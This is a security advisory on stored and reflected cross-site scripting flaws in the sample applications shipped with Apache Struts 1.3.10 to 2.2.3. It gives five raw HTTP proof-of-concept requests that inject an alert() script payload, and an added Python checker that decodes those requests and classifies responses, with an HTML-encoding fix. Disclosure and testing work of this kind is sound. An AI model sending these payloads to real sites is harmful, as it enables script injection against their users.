Apache Struts 1.3.10 / 2.0.14 / 2.2.3 Cross Site Scripting
2012-02-03T00:00:00
ID PACKETSTORM:109378 Type packetstorm Reporter Antu Sanadi Modified 2012-02-03T00:00:00
Description
`##############################################################################
#
# Title : Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
# Author : Antu Sanadi SecPod Technologies (www.secpod.com)
# Vendor : http://struts.apache.org/
# Advisory : http://secpod.org/blog/?p=450
# http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt
# Software : Apache struts 1.3.10, 2.0.14 and 2.2.3
# Date : 01/02/2012
#
##############################################################################
SecPod ID: 1021
21/07/2011 Issue Discovered
03/08/2011 Vendor Notified
No Response
01/02/2012 Advisory Released
Class: Cross-Site Scripting (Stored and Reflected) Severity: High
Overview:
---------
Multiple stored and reflected Cross-Site Scripting vulnerabilities in the
sample web applications (showcase, rest-showcase, cookbook and examples)
shipped with Apache Struts.
Technical Description:
----------------------
Multiple stored and reflected Cross-Site Scripting vulnerabilities are present
in the sample web applications shipped with Apache Struts, which fail to
encode user-supplied input before returning it in HTML responses.
i) Input passed via the 'name' and 'lastName' parameters (submitted as
'persons(1).name' and 'persons(1).lastName', see POC 1) to
'/struts2-showcase/person/editPerson.action' is stored and not properly
encoded before it is returned to users. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.
ii) Input passed via the 'clientName' parameter in
'/struts2-rest-showcase/orders' action is not properly verified before
it is returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in the context of a
vulnerable site.
iii) Input passed via the 'theText' form field of the multipart request to
'/struts-examples/upload/upload-submit.do?queryParam=Successful' (see
POC 3) is not properly verified before it is returned to the user. This can
be exploited to execute arbitrary HTML and script code in a user's browser
session in the context of a vulnerable site.
iv) Input passed via the 'message' parameter in
'/struts-cookbook/processSimple.do' action is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.
v) Input passed via the 'message' parameter in
'/struts-cookbook/processDyna.do' action is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.
These vulnerabilities have been tested on Apache Struts2 v2.2.3,
Apache Struts2 v2.0.14 and Apache Struts v1.3.10.
Other versions may also be affected.
Impact:
--------
Successful exploitation could allow an attacker to execute arbitrary HTML and
script code in a user's browser session in the context of a vulnerable
application.
Affected Software:
------------------
Apache Struts 2.2.3 and prior (showcase, rest-showcase, cookbook and examples
sample applications).
Tested on,
i) Apache struts 2.2.3 - Stored XSS
- struts2-showcase-2.2.3
- struts2-rest-showcase-2.2.3
ii) Apache struts 2.0.14 - Stored XSS
- struts2-showcase-2.0.14
iii) Apache struts 1.3.10 - Reflected XSS
- struts-cookbook-1.3.10
- struts-examples-1.3.10
References:
-----------
http://struts.apache.org
http://secpod.org/blog/?p=450
Proof of Concept:
-----------------
POC 1:
-----
Stored XSS
POST /struts2-showcase/person/editPerson.action HTTP/1.1
Host: SERVER_IP:8080
User-Agent: struts2-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Post Data:
----------
persons%281%29.name=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&persons%281%29.lastName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&method%3Asave=Save+all+persons
POC 2:
-----
Stored XSS
POST /struts2-rest-showcase/orders HTTP/1.1
Host: SERVER_IP:8080
User-Agent: struts2-rest-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Post Data:
----------
clientName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&amount=
POC 3:
-----
Reflected XSS
POST /struts-examples/upload/upload-submit.do?queryParam=Successful HTTP/1.1
Host: SERVER_IP:8080
User-Agent: Struts-examples XSS-TEST
Content-Type: multipart/form-data; boundary=---------------------------41701161044225432961947041
Content-Length: 481
Post Data:
----------
-----------------------------41701161044225432961947041\r\n
Content-Disposition: form-data; name="theText"\r\n
\r\n
<script>alert("SecPod-XSS-TEST")</script>\r\n
-----------------------------41701161044225432961947041\r\n
Content-Disposition: form-data; name="theFile"; filename=""\r\n
Content-Type: application/octet-stream\r\n
\r\n
\r\n
-----------------------------41701161044225432961947041\r\n
Content-Disposition: form-data; name="filePath"\r\n
\r\n
\r\n
-----------------------------41701161044225432961947041--\r\n
POC 4:
-----
Reflected XSS
POST /struts-cookbook/processSimple.do HTTP/1.1
Host: SERVER_IP:8080
User-Agent: Struts-cookbook XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Post Data:
----------
name=XYZ&secret=XYZ&color=red&confirm=on&rating=1&message=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&
POC 5:
-----
Reflected XSS
POST /struts-cookbook/processDyna.do HTTP/1.1
Host: SERVER_IP:8080
User-Agent: Struts-cookbook XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Post Data:
----------
name=ZYZ&secret=&color=red&message=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&
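The script below is an added example written for this page; it is not part of the SecPod advisory and not Apache Struts code. It serves both the Technical Description and the five PoC requests above: it decodes each PoC body the way the servlet container would (form-encoded for POC 1, 2, 4 and 5, multipart for POC 3), reports which fields actually carry the payload, and classifies a captured response page as 'vulnerable' (payload echoed verbatim), 'safe' (only an HTML-encoded form appears) or 'absent'. The response bodies it runs on are constructed stand-ins for pages fetched from a test instance; the template, function and variable names are assumptions of this example.

```python
"""Offline checker for the PoC requests in this advisory (added example)."""
import html
from email.parser import BytesParser
from urllib.parse import parse_qs

# The payload every PoC injects, in decoded form.
PAYLOAD = '<script>alert("SecPod-XSS-TEST")</script>'

# Form-encoded PoC bodies copied from POC 1, 2, 4 and 5.
POC_BODIES = {
    "/struts2-showcase/person/editPerson.action":
        "persons%281%29.name=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E"
        "&persons%281%29.lastName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E"
        "&method%3Asave=Save+all+persons",
    "/struts2-rest-showcase/orders":
        "clientName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&amount=",
    "/struts-cookbook/processSimple.do":
        "name=XYZ&secret=XYZ&color=red&confirm=on&rating=1"
        "&message=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&",
    "/struts-cookbook/processDyna.do":
        "name=ZYZ&secret=&color=red"
        "&message=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&",
}

# POC 3 body, rebuilt with real CRLFs from the advisory's "\r\n" notation.
POC3_BOUNDARY = "---------------------------41701161044225432961947041"
POC3_BODY = "\r\n".join([
    "--" + POC3_BOUNDARY,
    'Content-Disposition: form-data; name="theText"',
    "",
    PAYLOAD,
    "--" + POC3_BOUNDARY,
    'Content-Disposition: form-data; name="theFile"; filename=""',
    "Content-Type: application/octet-stream",
    "",
    "",
    "--" + POC3_BOUNDARY,
    'Content-Disposition: form-data; name="filePath"',
    "",
    "",
    "--" + POC3_BOUNDARY + "--",
    "",
]).encode()


def injected_params(body: str) -> dict[str, str]:
    """Decode a form body and return only the fields whose value is the payload."""
    fields = parse_qs(body, keep_blank_values=True)
    return {name: values[0] for name, values in fields.items()
            if values and values[0] == PAYLOAD}


def multipart_fields(body: bytes, boundary: str) -> dict[str, str]:
    """Parse a multipart/form-data body with the stdlib email parser.

    Returns the non-file parts (name -> decoded text), dropping file parts so
    that the uploaded file of POC 3 is not mistaken for a text field.
    """
    head = b"Content-Type: multipart/form-data; boundary=" + boundary.encode() + b"\r\n\r\n"
    msg = BytesParser().parsebytes(head + body)
    out = {}
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        filename = part.get_param("filename", header="content-disposition")
        if name is not None and filename is None:
            out[name] = part.get_payload(decode=True).decode()
    return out


def classify(response_html: str, payload: str = PAYLOAD) -> str:
    """'vulnerable' if the payload is echoed verbatim, 'safe' if only an
    HTML-encoded form is present, 'absent' if this page does not echo it."""
    if payload in response_html:
        return "vulnerable"
    encoded = {html.escape(payload, quote=True), html.escape(payload, quote=False)}
    if any(e in response_html for e in encoded):
        return "safe"
    return "absent"


# Assumed stand-in for the page fragment that echoes a submitted field.
TEMPLATE = "<td>{value}</td>"


def render_unsafe(value: str) -> str:
    """Echo the value verbatim: the behaviour the advisory reports."""
    return TEMPLATE.format(value=value)


def render_safe(value: str) -> str:
    """HTML-body-context encoding, the fix for all five findings."""
    return TEMPLATE.format(value=html.escape(value, quote=True))


if __name__ == "__main__":
    for path, body in POC_BODIES.items():
        print(path, "->", sorted(injected_params(body)))
    print("/struts-examples/upload/upload-submit.do ->",
          sorted(k for k, v in multipart_fields(POC3_BODY, POC3_BOUNDARY).items() if v == PAYLOAD))
    print("as shipped:", classify(render_unsafe(PAYLOAD)))
    print("encoded   :", classify(render_safe(PAYLOAD)))
```

For POC 1 and 2 the payload is stored, so the page to classify is the one that lists persons or orders afterwards, not the POST response itself; for POC 3 to 5 it is the response to the POST. The verbatim-substring test only covers HTML body context; a value landing inside an attribute or a script block needs the encoding for that context, and `html.escape` alone is not sufficient there. Run this only against instances you are authorised to test.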
Solution:
---------
Fix not available at the time of publication. Do not deploy the Struts sample
applications (showcase, rest-showcase, cookbook, examples) on production or
Internet-facing servers.
Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = LOW
AUTHENTICATION = NONE
CONFIDENTIALITY_IMPACT = PARTIAL
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 6.4 (High) (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of these
vulnerabilities.
`